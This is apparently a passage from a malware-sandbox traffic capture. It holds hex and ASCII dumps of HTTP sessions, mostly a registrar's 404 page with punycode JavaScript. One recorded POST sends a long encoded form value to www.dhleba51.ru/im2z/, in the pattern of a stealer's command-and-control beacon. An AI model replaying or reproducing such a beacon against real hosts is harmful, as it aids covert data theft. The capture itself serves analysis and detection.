                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 4e 6f 74 6f 2b 53 61 6e 73 3a 77 67 68 74 40 34 30 30 3b 37 30 30 26 61 6d 70 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 79 61 73 74 61 74 69 63 2e 6e 65 74 2f 70 63 6f 64 65 2f 61 64 66 6f 78 2f 6c 6f 61 64 65 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 3e 0a 76 61 72 20 70 75 6e 79 63 6f 64 65 20 3d 20 6e 65 77 20 66 75 6e 63 74 69 6f 6e 20 50 75 6e 79 63 6f 64 65 28 29 20 7b 0a 20 20 20 20 74 68 69 73 2e 75 74 66 31 36 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 64 65 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 69 6e 70 75 74 29 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6f 75 74 70 75 74 20 3d 20 5b 5d 2c 20 69 3d 30 2c 20 6c 65 6e 3d 69 6e 70 75 74 2e 6c 65 6e 67 74 68 2c 76 61 6c 75 65 2c 65 78 74 72 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 68 69 6c 65 20 28 69 20 3c 20 6c 65 6e 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 6c 75 65 20 3d 20 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 69 2b 2b 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 28 76 61 6c 75 65 20 26 20 30 78 46 38 30 30 29 20 3d 3d 3d 20 30 78 44 38 30 30 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 65 78 74 72 61 20 3d 20 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 69 2b 2b 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 20 28 28 76 61 6c 75 65 20 26 20 30 78 46 43 30 30 29 20 21 3d 3d 20 30 78 44 38 30 30 29 20 7c 7c 20 28 28 65 78 74 72 61 20 26 20 30 78 46 43 30 30 29 20 21 3d 3d 20 30 78 44 43 30 30 29 20 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 55 54 46 2d 31 36 28 64 65 63 6f 64 65 29 3a 20 49 6c 6c 65 67 61 6c 20 55 54 46 2d 31 36 20 73 65 71 75 65 6e 63 65 22 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 6c 75 65 20 3d 20 28 28 76 61 6c 75 65 20 26 20 30 78 33 46 46 29 20 3c 3c 20 31 30 29 20 2b 20 28 65 78 74 72 61 20 26 20 30 78 33 46 46 29 20 2b 20 30 78 31 30 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74
                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title> 404</title> <link href="https://fonts.googleapis.com/css2?family=Noto+Sans:wght@400;700&amp;display=swap" rel="stylesheet"> <script src="https://yastatic.net/pcode/adfox/loader.js" crossorigin="anonymous"></script> <script type="text/javascript" language="javascript" >var punycode = new function Punycode() { this.utf16 = { decode:function(input){ var output = [], i=0, len=input.length,value,extra; while (i < len) { value = input.charCodeAt(i++); if ((value & 0xF800) === 0xD800) { extra = input.charCodeAt(i++); if ( ((value & 0xFC00) !== 0xD800) || ((extra & 0xFC00) !== 0xDC00) ) { throw new RangeError("UTF-16(decode): Illegal UTF-16 sequence"); } value = ((value & 0x3FF) << 10) + (extra & 0x3FF) + 0x10000; } out
                                        Apr 24, 2024 07:05:07.428970098 CEST1289INData Raw: 70 75 74 2e 70 75 73 68 28 76 61 6c 75 65 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 6f 75 74 70 75 74 3b 0a 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 65 6e 63 6f 64
                                        Data Ascii: put.push(value); } return output; }, encode:function(input){ var output = [], i=0, len=input.length,value; while (i < len) { value = input[i++]; if
                                        Apr 24, 2024 07:05:07.428989887 CEST1289INData Raw: 61 6d 70 29 20 3a 20 28 64 65 6c 74 61 20 3e 3e 20 31 29 3b 0a 20 20 20 20 20 20 20 20 64 65 6c 74 61 20 2b 3d 20 4d 61 74 68 2e 66 6c 6f 6f 72 28 64 65 6c 74 61 20 2f 20 6e 75 6d 70 6f 69 6e 74 73 29 3b 0a 0a 20 20 20 20 20 20 20 20 66 6f 72 20
                                        Data Ascii: amp) : (delta >> 1); delta += Math.floor(delta / numpoints); for (k = 0; delta > (((base - tmin) * tmax) >> 1); k += base) { delta = Math.floor(delta / ( base - tmin )); } return Math.floor(k +
                                        Apr 24, 2024 07:05:07.429176092 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 20 28 22 70 75 6e 79 63 6f 64 65 5f 62 61 64 5f 69 6e 70 75 74 28 31 29 22 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20
                                        Data Ascii: throw RangeError ("punycode_bad_input(1)"); } digit = decode_digit(input.charCodeAt(ic++)); if (digit >= base) { throw RangeError("punycode_bad_
                                        Apr 24, 2024 07:05:07.429220915 CEST1289INData Raw: 70 75 74 2e 6c 65 6e 67 74 68 3b 20 69 20 3c 20 6c 65 6e 3b 20 69 2b 2b 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 63 61 73 65 5f 66 6c 61 67 73 5b 69 5d 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                        Data Ascii: put.length; i < len; i++) { if (case_flags[i]) { output[i] = (String.fromCharCode(output[i]).toUpperCase()).charCodeAt(0); } } } return this.utf16.encode(output);
                                        Apr 24, 2024 07:05:07.429280043 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 6a 76 20 3d 20 69 6e 70 75 74 5b 6a 5d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 69 6a 76 20 3e 3d 20 6e 20 26 26 20 69 6a 76 20 3c 20 6d 29 20 6d 20 3d 20 69 6a 76 3b 0a
                                        Data Ascii: ijv = input[j]; if (ijv >= n && ijv < m) m = ijv; } if (m - n > Math.floor((maxint - delta) / (h + 1))) { throw RangeError("punycode_overflow (1)"); }
                                        Apr 24, 2024 07:05:07.429328918 CEST1289INData Raw: 20 20 20 20 20 20 20 76 61 72 20 64 6f 6d 61 69 6e 5f 61 72 72 61 79 20 3d 20 64 6f 6d 61 69 6e 2e 73 70 6c 69 74 28 22 2e 22 29 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 6f 75 74 20 3d 20 5b 5d 3b 0a 20 20 20 20 20 20 20 20 66 6f 72 20 28 76 61
                                        Data Ascii: var domain_array = domain.split("."); var out = []; for (var i=0; i < domain_array.length; ++i) { var s = domain_array[i]; out.push( s.match(/[^A-Za-z0-9-]/) ? "xn-
                                        Apr 24, 2024 07:05:07.429402113 CEST1289INData Raw: 61 70 70 65 72 20 7b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 31 30 32 34 70 78 3b 0a 09 09 09 64 69 73 70 6c 61 79 3a 20 66 6c 65 78
                                        Data Ascii: apper {padding: 0px;margin: 0 auto;max-width: 1024px;display: flex;flex-direction: column;justify-content: space-between; flex: 1 0 auto; } .logo { padding: 30px 40px; }
                                        Apr 24, 2024 07:05:07.429485083 CEST1289INData Raw: 20 2e 66 6f 6f 74 65 72 2d 6c 69 6e 6b 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 67 72 69 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 67 72 69 64 2d 61 72 65 61 3a 20 6c 69 6e 6b 73 3b 0a 20 20 20 20 20 20 20 20
                                        Data Ascii: .footer-links { display: grid; grid-area: links; grid-template-columns: repeat(2, 1fr); grid-column-gap: 80px; grid-row-gap: 10px; font-size: 13px; } .fo
                                        Apr 24, 2024 07:05:07.429575920 CEST1289INData Raw: 34 46 37 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 46 33 46 34 46 37 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20
                                        Data Ascii: 4F7; border-bottom: 1px solid #F3F4F7; } } </style></head><body><header> <div class="logo"> <a href="https://www.nic.ru/"> <svg width="100" height="42" viewBox="0 0
                                        Apr 24, 2024 07:05:07.773720026 CEST1289INData Raw: 36 33 34 43 34 30 2e 36 37 31 34 20 32 30 2e 38 38 35 37 20 34 30 2e 30 32 34 37 20 32 30 2e 39 34 37 35 20 33 39 2e 32 33 31 32 20 32 30 2e 39 34 37 35 5a 22 20 66 69 6c 6c 3d 22 23 31 34 32 39 35 45 22 3e 3c 2f 70 61 74 68 3e 0a 20 20 20 20 20
                                        Data Ascii: 634C40.6714 20.8857 40.0247 20.9475 39.2312 20.9475Z" fill="#14295E"></path> <path d="M53.1509 14.1788C53.1695 14.0678 53.1828 13.9659 53.1923 13.8744C53.2017 13.7815 53.2065 13.6867 53.2065 13.5876C53.2065 13.1011 53.0556


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3192.168.2.949718195.24.68.580
                                        TimestampBytes transferredDirectionData
                                        Apr 24, 2024 07:05:10.397248030 CEST1680OUTPOST /im2z/ HTTP/1.1
                                        Host: www.dhleba51.ru
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en
                                        Origin: http://www.dhleba51.ru
                                        Connection: close
                                        Content-Length: 1229
                                        Content-Type: application/x-www-form-urlencoded
                                        Cache-Control: no-cache
                                        Referer: http://www.dhleba51.ru/im2z/
                                        User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                        Data Raw: 5f 4e 79 34 3d 7a 78 76 31 75 73 58 67 67 48 79 48 67 37 64 47 75 6a 6e 38 58 70 32 6b 4b 2b 57 78 45 73 74 58 4b 39 54 2b 6d 69 77 77 49 51 57 63 6b 76 4b 67 68 6b 49 38 43 2b 48 2b 4c 64 4f 38 74 6b 6c 36 42 77 39 51 69 72 64 70 4c 4b 4b 61 61 71 31 59 62 76 5a 52 31 48 53 70 59 53 5a 58 55 75 54 43 72 6e 4c 42 36 67 38 30 4a 47 44 51 44 4e 4f 65 31 6f 42 4d 42 50 4c 64 2f 4a 58 73 38 6d 63 6b 75 41 74 73 66 61 46 52 59 35 71 54 6f 43 59 6c 41 6a 64 33 4e 58 48 73 57 2f 50 47 71 46 34 4a 51 70 32 30 4e 45 56 4d 42 4f 5a 38 64 4c 38 72 4d 4c 5a 55 64 74 38 2b 61 44 2f 70 7a 71 31 68 36 68 41 6b 48 35 32 46 56 6a 62 59 6f 37 30 6c 77 71 45 77 4c 72 72 42 39 68 53 77 48 35 39 32 5a 79 46 71 41 4d 67 6c 36 49 6d 77 4b 30 6b 6f 50 34 6c 44 31 61 57 4c 77 70 68 75 2b 47 32 69 41 75 34 41 74 68 6b 70 6a 45 2b 5a 74 76 59 34 4a 65 51 55 69 71 76 42 32 43 71 41 36 49 6f 35 37 53 65 65 73 56 39 67 42 4d 32 6a 57 55 6e 36 4b 47 69 43 49 30 32 48 5a 64 38 77 6a 32 54 43 64 62 4e 6b 55 4d 66 34 34 39 48 58 6e 67 59 70 6a 75 42 64 4e 36 4d 6d 6b 38 39 57 49 6b 41 52 2f 6b 79 54 75 6f 63 5a 2f 34 63 62 6f 6a 76 37 79 31 58 33 53 59 75 45 64 4e 38 75 74 34 34 6b 68 32 74 33 57 77 76 77 56 39 74 37 41 34 62 57 66 48 59 6c 43 52 6a 55 2b 4f 62 6d 49 71 31 69 41 55 79 42 50 34 36 6b 35 53 46 52 35 67 77 73 53 72 4b 6b 77 73 37 35 53 43 71 61 52 62 42 4d 55 6b 66 73 53 2f 65 45 34 4e 37 62 68 62 30 47 63 6e 63 2b 71 62 30 68 68 70 35 68 73 2f 58 69 4b 6b 65 2b 57 48 54 4f 7a 42 7a 66 47 33 75 5a 6b 35 75 6a 6a 35 52 6f 48 58 62 4c 72 32 48 53 76 54 65 56 50 74 71 45 30 45 6c 4c 4f 79 58 54 33 2f 39 46 75 6d 6a 64 62 4f 76 41 4f 48 58 48 69 75 53 63 34 68 4f 70 39 6c 34 62 37 34 6f 74 79 45 4d 65 76 70 73 6a 53 4e 7a 6c 54 52 41 72 65 35 45 7a 4a 2b 77 62 39 38 72 57 30 4a 6c 71 73 49 6f 6c 48 73 4b 46 46 33 63 58 39 58 4a 74 5a 51 5a 76 42 32 5a 79 42 44 2f 51 65 78 70 79 58 31 76 30 76 5a 4d 7a 36 39 46 6d 2f 48 39 37 6d 55 57 74 7a 78 69 2b 71 4f 4a 31 74 58 6d 65 7a 74 74 31 77 41 62 49 44 72 44 64 4b 55 39 53 48 75 55 79 73 45 79 6c 49 2f 48 32 6d 58 58 30 75 67 6e 78 55 67 4c 49 70 4c 32 61 48 48 72 59 34 47 6d 68 65 75 71 56 54 34 36 73 32 6b 71 67 45 71 75 2f 53 2f 6d 36 6c 36 30 4d 50 6b 76 44 6f 37 73 5a 74 71 58 35 70 75 66 78 2f 32 65 2b 64 58 4f 2b 37 72 4e 2f 67 77 48 6d 39 5a 31 36 4a 2f 64 34 69 6f 30 54 30 4c 37 2b 56 70 49 4f 74 75 6a 7a 53 41 43 36 58 48 47 76 55 41 77 32 32 44 53 74 59 65 62 48 74 48 72 69 38 56 42 4b 76 65 35 69 59 43 52 32 72 44 78 52 42 71 52 43 71 6f 6e 68 32 68 70 55 6d 35 55 36 4a 7a 42 74 2f 6f 74 77 4b 46 6f 42 46 79 64 58 4d 6f 51 46 42 6e 41 34 4a 6e 54 33 48 38 30 79 32 55 6a 44 5a 6d 75 38 4e 2b 38 54 77 53 43 32 4e 55 64 36 53 6c 4d 56 55 53 43 67 6a 55 39 6f 5a 37 6d 34 4b 61 5a 57 62 50 4b 36 74 2f 62 56 4b 4e 61 66 65 74 37 75 37 71 58 59 43 45 74 57 4b 2b 47 74 61 2f 79 61 4b 57 7a 37 47 41 68 72 76 63 41 65 35 6a 44 36 69 36 53 57 74 68 4b 50 73 64 53 74 69 6a 68 5a 61 64 6e 71 77 4d 66 58 35 67 59 6f 31 66 62 42 2b 77 77 43 66 70 55 30 71 34 4d 77 36 47 6e 6a 4f 56 47 4f 41 66 52 39 4d 50 2b 58 6a 72 31 6e 71 6a 54 68 41 53 75 46 55 43 76 7a 66 4d 31 4c 49 58 4c 41 57 50 2b 4e 41 50 74 42 6a 5a 62 53 79 50 64 61 63 2b 5a 2f 58 72 47 37 32 37 76 30 2f 4b 47 57 65 2f 6b 42 56 6d 34 44 59 64 76 59 63 37 4c 4a 55 42 35 6c 65 67 59 77 49 4d 4f 72 43 73 47 6e 4b 31 51 53 54 39 51 2b 41 61 77 64 57 45 64 6f 4a 48 37 5a 61 6a 36 4d 68 4b 72 31 59 38 55 4c 4e 51 42 6b 66 72 46 45 4f 68 71 7a 78 34 41 4a 71 46 46 33 34 30 45 64 53 7a 71 44 73 4a 47 6b 38 46 49 56 52 63 51 7a 5a 31 6c 68 42 6f 59 4e 78 6e 6b 57 2b 43 52 42 67 6d 41 68 62 62 67 74 59 6f 32 49 70 73 6f 61 46 70 56 38 4d 39 63 3d
                                        Data Ascii: _Ny4=zxv1usXggHyHg7dGujn8Xp2kK+WxEstXK9T+miwwIQWckvKghkI8C+H+LdO8tkl6Bw9QirdpLKKaaq1YbvZR1HSpYSZXUuTCrnLB6g80JGDQDNOe1oBMBPLd/JXs8mckuAtsfaFRY5qToCYlAjd3NXHsW/PGqF4JQp20NEVMBOZ8dL8rMLZUdt8+aD/pzq1h6hAkH52FVjbYo70lwqEwLrrB9hSwH592ZyFqAMgl6ImwK0koP4lD1aWLwphu+G2iAu4AthkpjE+ZtvY4JeQUiqvB2CqA6Io57SeesV9gBM2jWUn6KGiCI02HZd8wj2TCdbNkUMf449HXngYpjuBdN6Mmk89WIkAR/kyTuocZ/4cbojv7y1X3SYuEdN8ut44kh2t3WwvwV9t7A4bWfHYlCRjU+ObmIq1iAUyBP46k5SFR5gwsSrKkws75SCqaRbBMUkfsS/eE4N7bhb0Gcnc+qb0hhp5hs/XiKke+WHTOzBzfG3uZk5ujj5RoHXbLr2HSvTeVPtqE0ElLOyXT3/9FumjdbOvAOHXHiuSc4hOp9l4b74otyEMevpsjSNzlTRAre5EzJ+wb98rW0JlqsIolHsKFF3cX9XJtZQZvB2ZyBD/QexpyX1v0vZMz69Fm/H97mUWtzxi+qOJ1tXmeztt1wAbIDrDdKU9SHuUysEylI/H2mXX0ugnxUgLIpL2aHHrY4GmheuqVT46s2kqgEqu/S/m6l60MPkvDo7sZtqX5pufx/2e+dXO+7rN/gwHm9Z16J/d4io0T0L7+VpIOtujzSAC6XHGvUAw22DStYebHtHri8VBKve5iYCR2rDxRBqRCqonh2hpUm5U6JzBt/otwKFoBFydXMoQFBnA4JnT3H80y2UjDZmu8N+8TwSC2NUd6SlMVUSCgjU9oZ7m4KaZWbPK6t/bVKNafet7u7qXYCEtWK+Gta/yaKWz7GAhrvcAe5jD6i6SWthKPsdStijhZadnqwMfX5gYo1fbB+wwCfpU0q4Mw6GnjOVGOAfR9MP+Xjr1nqjThASuFUCvzfM1LIXLAWP+NAPtBjZbSyPdac+Z/XrG727v0/KGWe/kBVm4DYdvYc7LJUB5legYwIMOrCsGnK1QST9Q+AawdWEdoJH7Zaj6MhKr1Y8ULNQBkfrFEOhqzx4AJqFF340EdSzqDsJGk8FIVRcQzZ1lhBoYNxnkW+CRBgmAhbbgtYo2IpsoaFpV8M9c=
                                        Apr 24, 2024 07:05:10.746354103 CEST1289INHTTP/1.1 404 Not Found
                                        Server: openresty
                                        Date: Wed, 24 Apr 2024 05:05:10 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Content-Length: 48773
                                        Connection: close
                                        Accept-Ranges: bytes
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 4e 6f 74 6f 2b 53 61 6e 73 3a 77 67 68 74 40 34 30 30 3b 37 30 30 26 61 6d 70 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 79 61 73 74 61 74 69 63 2e 6e 65 74 2f 70 63 6f 64 65 2f 61 64 66 6f 78 2f 6c 6f 61 64 65 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 3e 0a 76 61 72 20 70 75 6e 79 63 6f 64 65 20 3d 20 6e 65 77 20 66 75 6e 63 74 69 6f 6e 20 50 75 6e 79 63 6f 64 65 28 29 20 7b 0a 20 20 20 20 74 68 69 73 2e 75 74 66 31 36 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 64 65 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 69 6e 70 75 74 29 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6f 75 74 70 75 74 20 3d 20 5b 5d 2c 20 69 3d 30 2c 20 6c 65 6e 3d 69 6e 70 75 74 2e 6c 65 6e 67 74 68 2c 76 61 6c 75 65 2c 65 78 74 72 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 68 69 6c 65 20 28 69 20 3c 20 6c 65 6e 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 6c 75 65 20 3d 20 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 69 2b 2b 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 28 76 61 6c 75 65 20 26 20 30 78 46 38 30 30 29 20 3d 3d 3d 20 30 78 44 38 30 30 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 65 78 74 72 61 20 3d 20 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 69 2b 2b 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 20 28 28 76 61 6c 75 65 20 26 20 30 78 46 43 30 30 29 20 21 3d 3d 20 30 78 44 38 30 30 29 20 7c 7c 20 28 28 65 78 74 72 61 20 26 20 30 78 46 43 30 30 29 20 21 3d 3d 20 30 78 44 43 30 30 29 20 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 55 54 46 2d 31 36 28 64 65 63 6f 64 65 29 3a 20 49 6c 6c 65 67 61 6c 20 55 54 46 2d 31 36 20 73 65 71 75 65 6e 63 65 22 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 6c 75 65 20 3d 20 28 28 76 61 6c 75 65 20 26 20 30 78 33 46 46 29 20 3c 3c 20 31 30 29 20 2b 20 28 65 78 74 72 61 20 26 20 30 78 33 46 46 29 20 2b 20 30 78 31 30 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74
                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title> 404</title> <link href="https://fonts.googleapis.com/css2?family=Noto+Sans:wght@400;700&amp;display=swap" rel="stylesheet"> <script src="https://yastatic.net/pcode/adfox/loader.js" crossorigin="anonymous"></script> <script type="text/javascript" language="javascript" >var punycode = new function Punycode() { this.utf16 = { decode:function(input){ var output = [], i=0, len=input.length,value,extra; while (i < len) { value = input.charCodeAt(i++); if ((value & 0xF800) === 0xD800) { extra = input.charCodeAt(i++); if ( ((value & 0xFC00) !== 0xD800) || ((extra & 0xFC00) !== 0xDC00) ) { throw new RangeError("UTF-16(decode): Illegal UTF-16 sequence"); } value = ((value & 0x3FF) << 10) + (extra & 0x3FF) + 0x10000; } out
                                        Apr 24, 2024 07:05:10.746409893 CEST1289INData Raw: 70 75 74 2e 70 75 73 68 28 76 61 6c 75 65 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 6f 75 74 70 75 74 3b 0a 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 65 6e 63 6f 64
                                        Data Ascii: put.push(value); } return output; }, encode:function(input){ var output = [], i=0, len=input.length,value; while (i < len) { value = input[i++]; if
                                        Apr 24, 2024 07:05:10.746908903 CEST1289INData Raw: 61 6d 70 29 20 3a 20 28 64 65 6c 74 61 20 3e 3e 20 31 29 3b 0a 20 20 20 20 20 20 20 20 64 65 6c 74 61 20 2b 3d 20 4d 61 74 68 2e 66 6c 6f 6f 72 28 64 65 6c 74 61 20 2f 20 6e 75 6d 70 6f 69 6e 74 73 29 3b 0a 0a 20 20 20 20 20 20 20 20 66 6f 72 20
                                        Data Ascii: amp) : (delta >> 1); delta += Math.floor(delta / numpoints); for (k = 0; delta > (((base - tmin) * tmax) >> 1); k += base) { delta = Math.floor(delta / ( base - tmin )); } return Math.floor(k +
                                        Apr 24, 2024 07:05:10.747092009 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 20 28 22 70 75 6e 79 63 6f 64 65 5f 62 61 64 5f 69 6e 70 75 74 28 31 29 22 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20
                                        Data Ascii: throw RangeError ("punycode_bad_input(1)"); } digit = decode_digit(input.charCodeAt(ic++)); if (digit >= base) { throw RangeError("punycode_bad_
                                        Apr 24, 2024 07:05:10.747138023 CEST1289INData Raw: 70 75 74 2e 6c 65 6e 67 74 68 3b 20 69 20 3c 20 6c 65 6e 3b 20 69 2b 2b 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 63 61 73 65 5f 66 6c 61 67 73 5b 69 5d 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                        Data Ascii: put.length; i < len; i++) { if (case_flags[i]) { output[i] = (String.fromCharCode(output[i]).toUpperCase()).charCodeAt(0); } } } return this.utf16.encode(output);
                                        Apr 24, 2024 07:05:10.747189999 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 6a 76 20 3d 20 69 6e 70 75 74 5b 6a 5d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 69 6a 76 20 3e 3d 20 6e 20 26 26 20 69 6a 76 20 3c 20 6d 29 20 6d 20 3d 20 69 6a 76 3b 0a
                                        Data Ascii: ijv = input[j]; if (ijv >= n && ijv < m) m = ijv; } if (m - n > Math.floor((maxint - delta) / (h + 1))) { throw RangeError("punycode_overflow (1)"); }
